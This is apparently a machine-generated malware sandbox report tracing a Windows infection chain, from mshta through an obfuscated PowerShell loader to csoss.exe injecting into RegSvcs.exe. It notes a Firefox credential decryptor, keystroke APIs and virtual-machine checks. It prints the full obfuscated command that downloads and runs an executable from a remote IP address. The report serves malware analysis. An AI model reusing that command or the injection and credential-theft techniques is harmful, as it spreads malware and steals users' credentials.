                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268 Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D6445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00D6445A
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D6C6D1 FindFirstFileW,FindClose,6_2_00D6C6D1
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00D6C75C
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00D6EF95
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00D6F0F2
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00D6F3F3
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00D637EF
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00D63B12
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00D6BCBC
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00D049A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: mshta.exe, 00000000.00000002.2509520433.0000000005F60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1404161874.0000000006D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}K
                    Source: csoss.exe, 00000006.00000003.1388207507.0000000001151000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388207507.0000000001132000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388297635.0000000001151000.00000004.00000020.00020000.00000000.sdmp, acrorrheuma.6.drBinary or memory string: WR_HGfSGVWXMWGD3
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1404429717.0000000006D66000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1413448646.0000000007CEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1413448646.0000000007C72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: csoss.exe, 00000006.00000003.1387959668.0000000001031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                    Source: RegSvcs.exe, 00000007.00000002.2508024337.00000000005A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exeAPI call chain: ExitProcess graph end nodegraph_6-104262
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096C168 LdrInitializeThunk,LdrInitializeThunk,7_2_0096C168
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D73F09 BlockInput,6_2_00D73F09
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00D03B3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_00D35A7C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D04B37 LoadLibraryA,GetProcAddress,6_2_00D04B37
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00FE20E8 mov eax, dword ptr fs:[00000030h]6_2_00FE20E8
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00FE37A8 mov eax, dword ptr fs:[00000030h]6_2_00FE37A8
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00FE3748 mov eax, dword ptr fs:[00000030h]6_2_00FE3748
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,6_2_00D580A9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00D2A155
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2A124 SetUnhandledExceptionFilter,6_2_00D2A124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi32_5308.amsi.csv, type: OTHER
Source: 6.2.csoss.exe.eb0000.1.raw.unpack, UltraSpeed.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 6.2.csoss.exe.eb0000.1.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 6.2.csoss.exe.eb0000.1.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\csoss.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3F8008
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D587B1 LogonUserW, 6_2_00D587B1
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 6_2_00D03B3A
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_00D048D7
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D64C53 mouse_event, 6_2_00D64C53
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5CF.tmp" "c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP"
Source: C:\Users\user\AppData\Roaming\csoss.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jedhicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxrzugugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlcmrfrmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvyte1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagz1draxbnredkcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagamdrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfaxpjtuh2dkjalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrsk7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaivedorg9hcunlryigicagicagicagicagicagicagicagicagicagicagicaglu5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagicbwr1zhbyagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrhyto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmjavy3nvc3muzxhliiwijevodjpbufbeqvrbxgnzb3nzlmv4zsismcwwkttzvgfyvc1zbevfccgzkttjblzvs0utaxrftsagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jedhicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxrzugugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlcmrfrmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvyte1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagz1draxbnredkcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagamdrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfaxpjtuh2dkjalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrsk7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaivedorg9hcunlryigicagicagicagicagicagicagicagicagicagicagicaglu5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagicbwr1zhbyagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrhyto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmjavy3nvc3muzxhliiwijevodjpbufbeqvrbxgnzb3nzlmv4zsismcwwkttzvgfyvc1zbevfccgzkttjblzvs0utaxrftsagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]0x22+'))')))"
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 6_2_00D57CAF
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 6_2_00D5874B
Source: csoss.exe, 00000006.00000000.1384714838.0000000000DB4000.00000002.00000001.01000000.0000000A.sdmp, csoss.exe.3.dr, csoss[1].exe.3.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: csoss.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D2862B cpuid 6_2_00D2862B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
